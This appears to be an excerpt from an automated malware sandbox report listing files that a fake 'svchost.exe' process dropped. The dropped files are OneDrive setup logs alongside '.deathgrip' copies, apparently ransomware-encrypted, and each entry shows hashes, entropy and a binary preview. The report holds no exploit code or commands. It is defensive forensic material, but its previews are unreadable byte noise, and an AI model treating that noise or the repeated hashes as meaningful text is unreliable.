                                                          Preview:?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-03_115005_9064-2616.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):262144
                                                          Entropy (8bit):7.916372329904234
                                                          Encrypted:false
                                                          SSDEEP:6144:lnDke9gyVWRlJrrOtgR15uIsls0tCKxa1D70+VAJRP/kDTdkjtu:lnDn012678n1w0ap7LAJRP/Um
                                                          MD5:4CFB3797AAEFAD61ABE1A1A9E6DE06AD
                                                          SHA1:4216601F0D1C15D4466EAA94E08C3B561EA3AA11
                                                          SHA-256:56C6F827FA1BC63AD5F1821B9FF6EC052AA0797A29246E7018A57C03E378C6B7
                                                          SHA-512:1039831FA9E6FB6839E77292EA192E7F6979D63AB0AA0F8617AF59877D5EF8C9C738562AE2C8D9960E47AA7DB24A788CA6BF1E8F6AF24E99AAD38F8E7177CDBC
                                                          Malicious:false
                                                          Preview:..........,78(....0*.Y:...B.EX..*B.........}....|...l.u.. m....goP..$b..J..02.1N.F....b....b.&s..........g.:......X.S.K..n.M.5...c*azf+Y.....e....E....*(......KH...cv|...qz3%#..>}.7[.oqOl..|..:...`.....x=`..#w0_u.....u.O.J...D=..]u..;l.y... .Y..?..Ie.C..Y...S..a.+.......U..&....v9...?.N.\./[.U..V.<.C#.3.!KD.K....].y]..O]...P..>.Y.)....F.}g...]....J..........z<r..77R+....h?{./...l.....>...:OIq...94#..X.)..a....R.._.A;K.....{.p.:.W..zV..H....+.2...%9...W.....h.V..~..N&..D.n.I#SO......o.....~.O.(m...G.?.5..e.Y....=0r....N@...).{".qk.........K...D........-.Y....~L...T!Ys........i..?D..=..$,G..36..|[}\X"Id......!....J...5..J.....@.G..E.w.....]..y .c...CE...AF.+.go>0sw...U.M..H../..Z..}..n@..Dg.~............K.....K~37(.Zh.m....}"....F..u+......~.aT.._/.+R..`.jq4.......UE......8..,.x..GFj.o.~v|.Z...j.d.^.0y..Yn...S....IjI.......s......v..+.cV...........3>....8.....z.@....b?.d.:(..f.......g.U_.l.....;26...=..2...J,.$.yD....h.?.x.j.....`..rs.

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-04_093243_16a0-1d8c.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Preview:?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Install-PerUser_2023-10-04_093243_16a0-1d8c.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):131072
                                                          Entropy (8bit):6.650154262776427
                                                          Encrypted:false
                                                          SSDEEP:3072:Lc7PUg9Mt/LlhgxzmOO24XO4vBcEddt2u:LeUg9+D/IzmOO24pBFdt2u
                                                          MD5:30407389C2F3DC0187B317F18D6990CD
                                                          SHA1:30AC2EB7189DC0577F1FD856E85D345F61CCBF80
                                                          SHA-256:E834A506181A96B768F1519AFD2778A5F2241516912F78EEE92DBDE2B06BEF0B
                                                          SHA-512:14E3340F229478565D1BF57995D25F79D717DB3FE2B42F818311318FE52E8B7D156469D3C059C74885B4789820B2CD7BFC8FB1F5C6F48A577DF8E2A936E4BF78
                                                          Malicious:false
                                                          Preview:.........!.<r.8'..`....i`Y+.B....^.l..V.[.].*...&Kc.*.....N.:l...-...+.....m.......L.G=..C.c9.^9K..Qxj..>..V.RH....&LLk..P..8-.J^.k@.C9^.t...?\S6..]v+..!......(......s.T%.G!...1...y6.....t.d.0O.j..../.....=.>.=9g..kB.;..| .*H;.3....v....Z.*.1)..........5...2.0..(1>`E..B?._..CY.'_T.b...i.N.u/.&.n..,....N......=..c-*.tw...'...s.h..d<.z..!...~[....o...%.nQ...k..D..W..ppT..S.CO..[.k`K}.s*^UI..a.....S......l..'.`....P.......Go....$#.l..W*...&.S..p.....T....o7..u%.?k+....Q..B7......&..(6C....W.2/.=....`....L1[N?............6...T..k...s.R'...l.F.)..p......Q....,^}Nj....L......eK..NP.7c.K.M.*.2BR=....T.2....$$y..p.wC..iOB2*..w....w../.....p...K.^....G.k6K.7ZE..EP...z.../........6.v.5t{..W..G...H=..2..&./...c....)B/.?K..z .H.....NY..?..{..+.U].....)l3r..S`O.nZ.`.+r.).5.O..p..i......*d...5^.@.........O..p..&....%L.;.r...../...a.T.....wJ..D.s.-.H.......khN..$...16........m.K.IaBAH.:....7..>.`.0.7.....e..Z...P..(F......]3H.q..z..m..^.m.gZ@.U....T..G"#..

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_114932_b84-2220.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.0021292244851304357
                                                          Encrypted:false
                                                          SSDEEP:3:v:v
                                                          MD5:A7AEE61DDCEA3E22CE0C9366C32544DD
                                                          SHA1:E1572BA5359FDEB9994379FFC1DE30F7FD9ED34A
                                                          SHA-256:EF0E2C4E17A614B9546566D1C7EEA08A6AAADEFCC8EA85EB720CC95375D65333
                                                          SHA-512:A6B37CEB767E45A65E8DE6A474F14187252A829B816214103F5B361976B86D1549B3F288E87E22221A63FC606B94D234A5BFF3C9924AAB9BC7C5E73FF5DB73EF
                                                          Malicious:false
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_115005_4240-5892.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Preview:?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-03_115005_4240-5892.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):4.50404454616003
                                                          Encrypted:false
                                                          SSDEEP:768:AIK6NHZabU+SQTIgDTx6coSwL9rKOhA34t6YYAJ+KPJluZ+:AqtZ/yIgBVUKX34tszK
                                                          MD5:FB9634DFFDC79FD092A351149F200563
                                                          SHA1:1FA3B65319FD548590FB1461B857AA7242C2C24D
                                                          SHA-256:18B4F965544E264488A5060F8F43A9C0D44797B7FECF73CD3EBED399FA479390
                                                          SHA-512:208D92AF8E1042381531CA58411D7D30F93A31E08C6FA35B6D0FC644D2CDC1C09AAFA8857AAAF494187321D4CB4414B95D0F4A2F8FFEE56CF3F67198EA6C4529
                                                          Malicious:false
                                                          Preview:..........[.v......D11.7.:......C.....)O.M.,.."....ke..+...jf.u...@%......t..enD............e..*[.l..g...|.2..V.H|.g0.m_.J..e........nt.....N...NM;...i..|".......}...~..`.......pt...s..e.....D..74..zZ.l.D.8o....'.<.Ht.TnI.. ......n{fq..]a....fb....E..?.i:.R"..w.:!,.....jv...O.XW.|....p..u.. ZrF..rA.1.v4Im........?.B.........8W.Yb7?G.......|.X'!K.....C...0..e....(HvBG..4O.o..=....L!P9.8^...s.MiP..N]~...].s.n...2...D=...8../_.......W.B..N.=...\...)q..p..m.Y.Q{.7hF...f)."......(.?...\.U............&F.eQ..).n..r.T.z/.2..-t....$..$...NV.VV'.3.4.s.0)W..F......N.....|..d0..a......%..........8rkj..........( ....].+....ySH.X....F.2....Z.~...._..7~6..]...U.....x.....D(RN...m~.Q.b7A..C..x.......<$.......i.*..U.#-....p.2..B...jJ...{.......w.prBb......."0.......g%z%$...p.K ....a...s`.s.....@ERt.?k=.....97....N...: 9..(....}..."...m?....q..l....A.r%.....y.......cG......N.X.0.<.O.?w._g]-..1.Y+E...0V2.)Y.....1t.q.2h...6....p..6.|_L

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-04_093243_14f4-1074.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Preview:?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2023-10-04_093243_14f4-1074.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):131072
                                                          Entropy (8bit):6.629861518290798
                                                          Encrypted:false
                                                          SSDEEP:1536:lIkmx+V/jCeZ5eChU4waQBrxRpYzMjY+fqH30zJsI9pEgp1YlixmMnujaQyloqIA:ikmcRCe5eCK4wlrxRazpVEzBpfwHaHr
                                                          MD5:60B6DD348CA3BF413A46AF370085D8D1
                                                          SHA1:19F62DA46C785B770DA0A8D1E8EFFA33F38689D7
                                                          SHA-256:A86A87E6177B1A81D0C742ED2D82DCA77A0E765CE7B2434297A8DAFCBFFEC879
                                                          SHA-512:C1E65368C81726A880A93365C86F34944278C8539FDE5C9FB08EC85E2093387CDEC019646FB591FCF23200B27987579278AD82D6AEF08A0156A9BE4742527FF8
                                                          Malicious:false
                                                          Preview:...........['....z....+Dk....D.@gq.S..|&.O.r/~.}B.0..[...X.,..NxFy..>3..cJ.ui.*..[I1..w>KQfi.Eu.Q.8...F....)i...!.Q....ZD0...<{....;y..j.....j.....Q7..gj#..6n$....us........B..,...Y<Y........gwW.k"...*Q..9q..,...x[Y.<.H...I..w....x..a3..}o..7@zKE..o..qo..J..y.........,.....6.d(..........V..~`(Z.........D2...aBH.X.....)"...Hb.D..w~...._..CV#~...M...p.v.T.....1...WM.p...i#.............E."bC...4B.S.Rp...e....1..9$m$..r.}.......M......*.j.....'..........0..$.....q.B...7..x.Z...<.....j..B."V,jn....^......Y..?.B..C..&..5...z~x..%.o.F.B.z.......K8.Vf..)A4.c)XW......{.C.....,|....+.Y~..I..^j.9.z=..%1..Q..HH..cP......v..Q.?G.A..p.#i_W.w._w:gN..........Z.8.?Z..BL...%.Q>....c..L.-@qS.......I\...~....6~.$.s...RX.j.mF....n.L...4Z ...t8..[.$I!n.(:D.)P..s)..XE.}..w...........'|/...%[.L...1;.Fh|..4.._."..!......l..R.u.[\.bI1..\.......A.#W.c...ef......"G..mS@&.tM..9T.%.u)jJ}.3.S....=!...1.1./I....R@....G.X|~..8..i..E.d...L...36.t=..y..f.!E--~........

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\StandaloneUpdate_2023-10-04_084137_4224-6092.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Preview:?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\StandaloneUpdate_2023-10-04_084137_4224-6092.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.0021292244851304357
                                                          Encrypted:false
                                                          SSDEEP:3:v:v
                                                          MD5:A7AEE61DDCEA3E22CE0C9366C32544DD
                                                          SHA1:E1572BA5359FDEB9994379FFC1DE30F7FD9ED34A
                                                          SHA-256:EF0E2C4E17A614B9546566D1C7EEA08A6AAADEFCC8EA85EB720CC95375D65333
                                                          SHA-512:A6B37CEB767E45A65E8DE6A474F14187252A829B816214103F5B361976B86D1549B3F288E87E22221A63FC606B94D234A5BFF3C9924AAB9BC7C5E73FF5DB73EF
                                                          Malicious:false
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_114942_500-1efc.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Preview:?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_114942_500-1efc.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.0021292244851304357
                                                          Encrypted:false
                                                          SSDEEP:3:v:v
                                                          MD5:A7AEE61DDCEA3E22CE0C9366C32544DD
                                                          SHA1:E1572BA5359FDEB9994379FFC1DE30F7FD9ED34A
                                                          SHA-256:EF0E2C4E17A614B9546566D1C7EEA08A6AAADEFCC8EA85EB720CC95375D65333
                                                          SHA-512:A6B37CEB767E45A65E8DE6A474F14187252A829B816214103F5B361976B86D1549B3F288E87E22221A63FC606B94D234A5BFF3C9924AAB9BC7C5E73FF5DB73EF
                                                          Malicious:false
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_115011_3184-4676.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Preview:?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_115011_3184-4676.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):1.3179750374383061
                                                          Encrypted:false
                                                          SSDEEP:192:eHzvHWykROwMLlZh65Z+aQ42uEN6URtN7t:iyykROvLDh65croE1
                                                          MD5:AE810D15E327063642A1ABE9C5044122
                                                          SHA1:797B99792D4D7DA0FA55A1F4F696D805481A3C1C
                                                          SHA-256:0E045E9A295C534D77338726A3556B1A853E25C7C233B26BD2C5DCC82989B9B1
                                                          SHA-512:7E372027E613B892B70578949776152B59DF1D41BFCDFFBC00E7575C3AED01E75B9A3958826B8475C14C0417374E91BBDC9456131E5616D49BA2C15A7DA75BA1
                                                          Malicious:false
                                                          Preview:.........>}..8H.G...15.=....EjO...Q|.5%..0%....7......F...fl....V;K.Tk{n.].*.A.............:R.O.O..].32.....g...M..J.......q..<F.....fmr.G.../.:M.S....}F.|..!.A..A$..h...0....:..a..{w........T..4.......o.x(*Q..9.s<.*..W.nCZ.......V."....J\..w.Z..Ge..cL.-.X..[..N....X..3..d.[{.5..?...*.'.......>...4{reb;.p...<|rK....,k.i...........~....Q.e]._......{<0.i....\."...>..j..,u...X......T....d.u-..u.D..)..M&s...Q....F.T.P..%.......R.a.f.>..b.....NWf7.....V..p......wY'T......E...m..3.,..-O.'..y.(..P.U.W........6..~..L~y.gs./&....#.J..b.z..UE*g./.....hI..0...9.....8...k.O......^x.q..5W.j....Q .d.^..S./.k.U..P....T...B.c.-...Fd........kG\.mb.".2d.Wu.p..oO.j.A.$..u)..1.9..+_4:...r..-...A...i...:[.?.5...F.......t..qkl...].h]...xg..ZU....9.s....$.]s...".D.@.[....Y.P.g.D..4.(W..8..=.Fp.]Q.z......X.-8..q+._..4JV...}.+n.y...S.........\~.!.5....N&.{..........^Jn.a|..y.....Z..;.X.n.#..5B..(".^...e.7.{}.m5.....]@`.....Ma.L...!A.>.u....u.0....,..r..

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_115204_7008-7012.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Preview:?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_115204_7008-7012.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.0021292244851304357
                                                          Encrypted:false
                                                          SSDEEP:3:v:v
                                                          MD5:A7AEE61DDCEA3E22CE0C9366C32544DD
                                                          SHA1:E1572BA5359FDEB9994379FFC1DE30F7FD9ED34A
                                                          SHA-256:EF0E2C4E17A614B9546566D1C7EEA08A6AAADEFCC8EA85EB720CC95375D65333
                                                          SHA-512:A6B37CEB767E45A65E8DE6A474F14187252A829B816214103F5B361976B86D1549B3F288E87E22221A63FC606B94D234A5BFF3C9924AAB9BC7C5E73FF5DB73EF
                                                          Malicious:false
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_115740_6260-6264.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Preview:?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_115740_6260-6264.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.0021292244851304357
                                                          Encrypted:false
                                                          SSDEEP:3:v:v
                                                          MD5:A7AEE61DDCEA3E22CE0C9366C32544DD
                                                          SHA1:E1572BA5359FDEB9994379FFC1DE30F7FD9ED34A
                                                          SHA-256:EF0E2C4E17A614B9546566D1C7EEA08A6AAADEFCC8EA85EB720CC95375D65333
                                                          SHA-512:A6B37CEB767E45A65E8DE6A474F14187252A829B816214103F5B361976B86D1549B3F288E87E22221A63FC606B94D234A5BFF3C9924AAB9BC7C5E73FF5DB73EF
                                                          Malicious:false
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_121144_6972-6976.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Preview:?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_121144_6972-6976.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.732231659117873
                                                          Encrypted:false
                                                          SSDEEP:384:s0d42IMv0oJQhfU6/zgWSxCwNaweYM63JYPv+4pVTSz:hqesoWlUqBSxBEwU6K+4pNq
                                                          MD5:574613ADA80D35DA674D7776C92A4BC4
                                                          SHA1:E1339847BF24596F80C3724365D3E6D6E4145C09
                                                          SHA-256:0B3E6CCA2C0BF010F30D656A4280F1BDD6DF6D8CF59C8E0E2BEF8C616832E913
                                                          SHA-512:FF3046DDF85D84AF416F2C1DC9EA4A5B905C10546E53BCFA0A2E93034B45E4937D083109C67873A1CA8CC60A1883B27D73A557E7DC02C3DCABD6040B89BEE0FF
                                                          Malicious:false
                                                          Preview:..........L..LRB...!G.!<m.[2..Bu5..`.`.q>O.]..........08....y..U._.r[...."..=e...z4.u.;.i....."..B...(.=CU..\..p.o.~.J..v]..>..AR..._...[.....R..=.lp.O\h........#..V.z.+.;..dd.a//m_.u!U.g.;..Q.b/0r.R.>S[[...f. ..k..d....9n.U..........F...1.0S..)"z.G........q..&...3?.?N.3.B.:.g.L.:..s.Pi.hG.=..._S...p.^..{..h......a.!.Om......*..f.Q...Qh...#.s~.f.G..M.w6.@]....>.`.a.70..P.%...jR..i.B+sqA5.Z...t...K-.;../.9XX.W............`.^i.c..7..7_...1.;...0....{~.R%..r..G....m...^.X7E......s.<1&.....=.I.Y._...;..T .......].....?.R...o..p..".....|..`^...-.p..M..PV...6.!Y....PC....F~.fM\.....X...%OM..>.eV..........I.L.O).i!.....J.j.j.sN\....D..).. rK.....cg..#...!..s.#A.B..c....d&..^...s....x....@.m...w1....w....A....P.o;..:`.G9.4..e.l..U...E.r-|...:.....-..l.^...@%..!......V.o,...e.vRD'.vj....T.V.%%t..........z..h.".ap..>...>"S.=.E...,|s...y..f..G..u.- >u.~T..#".;R.#.P..0..W...3#.z7....-Q...B..H.U.....G9...1d.@..by...F....#...5..2 ....b:..N.J..

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_121212_7980-7984.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):2.6615423635777775E-4
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:F05CA86CFF1B7B6B2DD396A13BEB76C2
                                                          SHA1:166D7294B475634902404445AF7C363FBA847074
                                                          SHA-256:AB04BF42874FA27C273409A28DA41DE7BC6563AE22EE5DA07170C8989F16DE1F
                                                          SHA-512:9F91E56A558E073AC712CAC483DD3D8401D33B324D194DBD977D05981634D90B4A33992EA954ADD68EEB27A8A07BF044701E83D3B05D4800C86B0843395E437B
                                                          Malicious:false
                                                          Preview:?.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\jones\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_121212_7980-7984.log.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.0021292244851304357
                                                          Encrypted:false
                                                          SSDEEP:3:v:v
                                                          MD5:A7AEE61DDCEA3E22CE0C9366C32544DD
                                                          SHA1:E1572BA5359FDEB9994379FFC1DE30F7FD9ED34A
                                                          SHA-256:EF0E2C4E17A614B9546566D1C7EEA08A6AAADEFCC8EA85EB720CC95375D65333
                                                          SHA-512:A6B37CEB767E45A65E8DE6A474F14187252A829B816214103F5B361976B86D1549B3F288E87E22221A63FC606B94D234A5BFF3C9924AAB9BC7C5E73FF5DB73EF
                                                          Malicious:false
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

